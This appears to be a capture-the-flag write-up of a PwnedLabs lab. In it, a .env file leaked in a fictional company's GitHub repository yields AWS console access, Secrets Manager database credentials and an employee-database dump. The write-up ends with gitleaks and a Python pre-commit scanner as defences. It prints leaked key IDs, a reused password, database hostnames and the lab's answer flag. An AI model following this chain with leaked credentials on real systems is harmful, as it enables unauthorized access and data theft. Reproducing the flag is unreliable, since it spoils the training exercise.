PwnedLabs - Leverage Leaked Credentials for Pwnage

Summary

In this blog, we will take a look at the "Leverage Leaked Credentials for Pwnage" lab, in which sensitive credentials and keys exposed in a company's public repository lead to access to the company's AWS console and Secrets Manager, which in turn reveals the database credentials.

Topics Covered

Here are the topics covered in this blog -

  • Layout of the attack chain.

  • Detailed explanation of the attack steps.

  • Possible defensive measures.

Attack Scenario

Official scenario description.

In the ever-shifting world of logistics, Huge Logistics has emerged as an undisputed global leader. Yet, every Goliath has its vulnerabilities. Whispered rumors in cybersecurity circles suggest that amidst the vast digital sprawl of Huge Logistics, there might lie unnoticed weaknesses. As a seasoned security consultant, your mission is set: Navigate the labyrinth of Huge Logistics' GitHub repositories, looking for the smallest chink in their armor. Dive deep, analyze thoroughly, and leave no stone unturned. Can you spot what others have missed?

Before we move further into exploitation, I would like to visualize the whole attack chain.

The attacker here starts out unauthenticated, holding no IAM credentials, and:

  1. Discovers an organization's open-source GitHub repository.

  2. Extracts sensitive credentials from the .env file.

  3. Uses the credentials to log in to the organization's AWS Management Console.

  4. Discovers secrets and database credentials in AWS Secrets Manager.

  5. Uses database credentials to login and extract the flag.

Setup

For this attack demonstration, we don't require an initial access key for an authenticated IAM user. We can use our own AWS keys, but that is optional here.

GitHub Repo Enumeration

We're already provided with the target organization's GitHub repository.

https://github.com/huge-logistics/aws-react-app

Let's visit the repository.

This is a basic AWS React JS application. It contains a .env file, a hidden file used by a variety of applications and frameworks to define environment variables, which frequently include credentials.

This file has a lot of credentials related to Laravel, DevOps and MySQL databases. Taking a further look.

As we can see, there is an AWS Access Key ID, an AWS S3 bucket name and the region. We can try to derive the AWS account ID from the access key ID, and then check whether the database credentials for the user Jose are also valid AWS IAM credentials, since password reuse is a common bad practice.

Before that, let's verify whether the Access Key ID is genuine using aws sts get-access-key-info, which returns the account the key belongs to.

root@kali ~/p/leak-credentials# aws sts get-access-key-info --access-key-id AKIAWHEOTHRFVXYV44WP --profile Faran
{
    "Account": "427648302155"
}

Now that we have the account ID we can try to login to the AWS Management Console with the URL

https://427648302155.signin.aws.amazon.com/console

For the credentials we can use the Jose username and its password DevOps0001!

The credentials worked and we got a successful login. Checking the recently visited services, I found some secrets in Secrets Manager.

Two secrets seem interesting:

  • Employee-database

  • Employee-database-admin

Clicking on the service we see two secrets relating to an employee database. We're denied access to the admin secret (employee-database-admin), so let's check the other one, employee-database.

Open the "employee-database" secret, go to "Secret value" and click "Retrieve secret value".

From the above screenshot, we can see that it holds MySQL credentials. Let's log in using them.

root@kali ~/p/leak-credentials# mysql -h employees.cwqkzlyzmm5z.us-east-1.rds.amazonaws.com -P 3306 -D employees -u reports_clone -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 531401
Server version: 10.6.10-MariaDB managed by https://aws.amazon.com/rds/

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [employees]> show databases;
+--------------------+
| Database           |
+--------------------+
| employees          |
| information_schema |
+--------------------+
2 rows in set (0.203 sec)

MariaDB [employees]>

After logging into MySQL, there is a database called 'employees'.

MariaDB [employees]> use employees;
Database changed
MariaDB [employees]> show tables;
+---------------------+
| Tables_in_employees |
+---------------------+
| countries           |
| departments         |
| dependents          |
| employees           |
| flag                |
| jobs                |
| locations           |
| regions             |
+---------------------+
8 rows in set (0.203 sec)

Changing the database to 'employees' and listing the tables. There are a lot of interesting tables.

Checking out the employees table with the query select * from employees;

We retrieve employee data including their full name, email address, phone numbers and salary.

Listing more tables and their contents.

At this point the attacker has gained full access to the target organization's database and can query sensitive data. To finish this lab, retrieve the flag from the flag table.

MariaDB [employees]> select * from flag;
+----------------------------------+
| flag                             |
+----------------------------------+
| d0e4b22365ad230c53c4ffc269dc0202 |
+----------------------------------+
1 row in set (0.202 sec)

Possible Mitigation

The only real solution is not to push the .env file into the repository at all, since it leaks sensitive credentials to anyone who can read it. It is also recommended to implement a secure CI/CD pipeline.

To continuously check a repository for possible leaks, we can use a tool such as gitleaks. Here it is run against the target repository:

root@kali ~/p/leak-credentials [1]# git clone https://github.com/huge-logistics/aws-react-app
Cloning into 'aws-react-app'...
remote: Enumerating objects: 98, done.
remote: Counting objects: 100% (98/98), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 98 (delta 5), reused 95 (delta 5), pack-reused 0
Receiving objects: 100% (98/98), 83.34 KiB | 3.62 MiB/s, done.
Resolving deltas: 100% (5/5), done.
root@kali ~/p/leak-credentials# cd aws-react-app/
root@kali ~/p/l/aws-react-app (main)# gitleaks detect -v


Finding:     ...P_AWS_ACCESS_KEY_ID=AKIAWHEOTHRFVXYV44WP
Secret:      AKIAWHEOTHRFVXYV44WP
RuleID:      aws-access-token
Entropy:     3.821928
File:        .env
Line:        40
Commit:      48d24561bf29fe5a3990f9183d698b6e6fea8d4a
Author:      Jose Martinez
Email:       jose@pwnedlabs.io
Date:        2023-07-12T11:58:21Z
Fingerprint: 48d24561bf29fe5a3990f9183d698b6e6fea8d4a:.env:aws-access-token:40

5:05AM INF 2 commits scanned.
5:05AM INF scan completed in 192ms
5:05AM WRN leaks found: 1
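To show what a check like the gitleaks rule above does before a commit ever reaches GitHub, here is an added Python example (not code from the lab or from gitleaks) that implements a simplified version of the aws-access-token rule with the same Shannon entropy measure gitleaks reports, and applies a pre-commit policy that blocks any staged .env file and any file containing an AWS access key ID. The .env content is constructed for the demo (only the key ID is the one leaked in the lab), and the 3.0 entropy threshold and hook wiring are my own assumptions.

```python
import math
import re

# Pattern for AWS access key IDs, modelled on the gitleaks "aws-access-token"
# rule that fired above (assumption: a simplified version of that rule).
AWS_KEY_ID_RE = re.compile(r"\b((?:A3T[A-Z0-9]|AKIA|ASIA|ABIA|ACCA)[A-Z0-9]{16})\b")

# Constructed sample .env for the demo: the key ID is the one the lab's
# repository leaked; the variable names and other values are made up.
SAMPLE_ENV = """\
APP_NAME=aws-react-app
APP_AWS_REGION=us-east-1
APP_AWS_ACCESS_KEY_ID=AKIAWHEOTHRFVXYV44WP
DB_USERNAME=jose
"""

def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character, the measure gitleaks reports."""
    n = len(s)
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def find_aws_key_ids(text: str, min_entropy: float = 3.0) -> list:
    """One finding per key ID; low-entropy matches such as AKIA + 16 'A's are dropped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in AWS_KEY_ID_RE.finditer(line):
            secret = m.group(1)
            entropy = shannon_entropy(secret)
            if entropy >= min_entropy:
                findings.append({"line": lineno, "secret": secret, "entropy": entropy})
    return findings

def check_staged_files(staged: dict) -> list:
    """Pre-commit policy: block any .env file outright, and any file with key IDs.
    `staged` maps path -> content (a hook would fill it from `git diff --cached`)."""
    reasons = []
    for path, content in staged.items():
        if path.split("/")[-1] == ".env":
            reasons.append(f"{path}: .env files must not be committed")
        for f in find_aws_key_ids(content):
            reasons.append(f"{path}:{f['line']}: AWS access key ID "
                           f"{f['secret'][:4]}... (entropy {f['entropy']:.2f})")
    return reasons

if __name__ == "__main__":
    for reason in check_staged_files({".env": SAMPLE_ENV, "src/App.js": "const x = 1;"}):
        print("BLOCKED:", reason)
```

Note that the gitleaks output above also lists the commit in which the key was introduced: a key that has reached git history must be treated as compromised and rotated, since deleting the file in a later commit does not remove it.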

Thank you for reading 🔥
